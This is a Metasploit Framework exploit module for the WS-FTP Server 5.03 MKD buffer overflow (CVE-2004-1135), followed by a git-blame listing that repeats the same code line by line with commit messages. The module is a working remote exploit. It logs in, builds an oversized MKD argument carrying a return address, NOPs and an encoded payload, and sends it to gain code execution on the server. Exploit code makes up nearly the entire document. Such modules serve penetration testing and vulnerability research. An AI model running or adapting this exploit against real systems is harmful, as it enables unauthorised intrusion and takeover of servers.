metasploit-framework/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'WS-FTP Server 5.03 MKD Overflow',
			'Description'    => %q{
				This module exploits the buffer overflow found in the MKD
				command in IPSWITCH WS_FTP Server 5.03 discovered by Reed
				Arvin.
			},
			'Author'         => [ 'et', 'Reed Arvin <reedarvin[at]gmail.com>' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'Platform'       => [ 'win' ],
			'References'     =>
				[
					[ 'CVE', '2004-1135' ],
					[ 'OSVDB', '12509' ],
					[ 'BID', '11772'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 480,
					'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[
						'WS-FTP Server 5.03 Universal',
						{
							'Ret'      => 0x25185bb8,
							# Address is executable to allow XP and 2K
							# 0x25185bb8 = push esp, ret (libeay32.dll)
							# B85B1825XX = mov eax,0xXX25185b
						},
					],
				],
			'DisclosureDate' => 'Nov 29 2004',
			'DefaultTarget' => 0))
	end

	def check
		connect
		disconnect
		if (banner =~ /5\.0\.3/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect_login

		print_status("Trying target #{target.name}...")

		buf         = rand_text_alphanumeric(8192)
		buf[498, 4] = [ 0x7ffd3001 ].pack('V')
		buf[514, 4] = [ target.ret ].pack('V')
		buf[518, 4] = [ target.ret ].pack('V')
		buf[522, 2] = make_nops(2)
		buf[524, payload.encoded.length] = payload.encoded

		send_cmd( ['MKD', buf], true );

		handler
		disconnect
	end

end
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`
updated modules to use base class rand_xxx methods git-svn-id: file:///home/svn/framework3/trunk@4498 4d416f70-5f16-0410-b530-b9f4589650da 2007-03-01 08:21:36 +00:00			`# $Id$`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`

			`##`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`# This file is part of the Metasploit Framework and may be subject to`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 01:40:50 +00:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`

Changed up the way mixins are handled, all exploits just require 'msf/core' and all current mixins will be loaded. Egghunter was moved to a mixin and generates based on target arch and platform. git-svn-id: file:///home/svn/incoming/trunk@3111 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-26 00:04:26 +00:00			`require 'msf/core'`
Dun dun dun.. da dun! git-svn-id: file:///home/svn/incoming/trunk@3096 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-25 04:36:56 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`class Metasploit3 < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! git-svn-id: file:///home/svn/framework3/trunk@7724 4d416f70-5f16-0410-b530-b9f4589650da 2009-12-06 05:50:37 +00:00			`Rank = GreatRanking`
Dun dun dun.. da dun! git-svn-id: file:///home/svn/incoming/trunk@3096 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-25 04:36:56 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Ftp`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Dun dun dun.. da dun! git-svn-id: file:///home/svn/incoming/trunk@3096 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-25 04:36:56 +00:00			`def initialize(info = {})`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`super(update_info(info,`
Dun dun dun.. da dun! git-svn-id: file:///home/svn/incoming/trunk@3096 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-25 04:36:56 +00:00			`'Name' => 'WS-FTP Server 5.03 MKD Overflow',`
			`'Description' => %q{`
			`This module exploits the buffer overflow found in the MKD`
			`command in IPSWITCH WS_FTP Server 5.03 discovered by Reed`
			`Arvin.`
			`},`
Format dictatorship round 2: Fix author e-mail format for all exploit modules git-svn-id: file:///home/svn/framework3/trunk@13297 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-22 20:17:58 +00:00			`'Author' => [ 'et', 'Reed Arvin <reedarvin[at]gmail.com>' ],`
BSD license the default for non-msfdev created modules. git-svn-id: file:///home/svn/incoming/trunk@3636 4d416f70-5f16-0410-b530-b9f4589650da 2006-05-06 16:34:39 +00:00			`'License' => BSD_LICENSE,`
Dun dun dun.. da dun! git-svn-id: file:///home/svn/incoming/trunk@3096 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-25 04:36:56 +00:00			`'Version' => '$Revision$',`
move more platform designations from target to exploit info block git-svn-id: file:///home/svn/framework3/trunk@10559 4d416f70-5f16-0410-b530-b9f4589650da 2010-10-05 23:41:17 +00:00			`'Platform' => [ 'win' ],`
Dun dun dun.. da dun! git-svn-id: file:///home/svn/incoming/trunk@3096 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-25 04:36:56 +00:00			`'References' =>`
			`[`
OSVDB references from Steve Tornio git-svn-id: file:///home/svn/framework3/trunk@7030 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-12 04:22:58 +00:00			`[ 'CVE', '2004-1135' ],`
			`[ 'OSVDB', '12509' ],`
Dun dun dun.. da dun! git-svn-id: file:///home/svn/incoming/trunk@3096 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-25 04:36:56 +00:00			`[ 'BID', '11772'],`
			`],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'Space' => 480,`
			`'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",`
			`'StackAdjustment' => -3500,`
			`},`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`'Targets' =>`
Dun dun dun.. da dun! git-svn-id: file:///home/svn/incoming/trunk@3096 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-25 04:36:56 +00:00			`[`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`[`
Dun dun dun.. da dun! git-svn-id: file:///home/svn/incoming/trunk@3096 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-25 04:36:56 +00:00			`'WS-FTP Server 5.03 Universal',`
			`{`
			`'Ret' => 0x25185bb8,`
			`# Address is executable to allow XP and 2K`
			`# 0x25185bb8 = push esp, ret (libeay32.dll)`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`# B85B1825XX = mov eax,0xXX25185b`
Dun dun dun.. da dun! git-svn-id: file:///home/svn/incoming/trunk@3096 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-25 04:36:56 +00:00			`},`
			`],`
			`],`
			`'DisclosureDate' => 'Nov 29 2004',`
			`'DefaultTarget' => 0))`
			`end`

			`def check`
			`connect`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`disconnect`
Dun dun dun.. da dun! git-svn-id: file:///home/svn/incoming/trunk@3096 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-25 04:36:56 +00:00			`if (banner =~ /5\.0\.3/)`
			`return Exploit::CheckCode::Vulnerable`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`end`
Dun dun dun.. da dun! git-svn-id: file:///home/svn/incoming/trunk@3096 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-25 04:36:56 +00:00			`return Exploit::CheckCode::Safe`
			`end`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Dun dun dun.. da dun! git-svn-id: file:///home/svn/incoming/trunk@3096 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-25 04:36:56 +00:00			`def exploit`
			`connect_login`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Dun dun dun.. da dun! git-svn-id: file:///home/svn/incoming/trunk@3096 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-25 04:36:56 +00:00			`print_status("Trying target #{target.name}...")`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
updated modules to use base class rand_xxx methods git-svn-id: file:///home/svn/framework3/trunk@4498 4d416f70-5f16-0410-b530-b9f4589650da 2007-03-01 08:21:36 +00:00			`buf = rand_text_alphanumeric(8192)`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`buf[498, 4] = [ 0x7ffd3001 ].pack('V')`
Dun dun dun.. da dun! git-svn-id: file:///home/svn/incoming/trunk@3096 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-25 04:36:56 +00:00			`buf[514, 4] = [ target.ret ].pack('V')`
			`buf[518, 4] = [ target.ret ].pack('V')`
			`buf[522, 2] = make_nops(2)`
			`buf[524, payload.encoded.length] = payload.encoded`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Dun dun dun.. da dun! git-svn-id: file:///home/svn/incoming/trunk@3096 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-25 04:36:56 +00:00			`send_cmd( ['MKD', buf], true );`
Fixed handler/disconnect order in FTP, fixes to metafile git-svn-id: file:///home/svn/incoming/trunk@3348 4d416f70-5f16-0410-b530-b9f4589650da 2006-01-08 14:27:59 +00:00
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00			`handler`
Dun dun dun.. da dun! git-svn-id: file:///home/svn/incoming/trunk@3096 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-25 04:36:56 +00:00			`disconnect`
			`end`

OSVDB references from Steve Tornio git-svn-id: file:///home/svn/framework3/trunk@7030 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-12 04:22:58 +00:00			`end`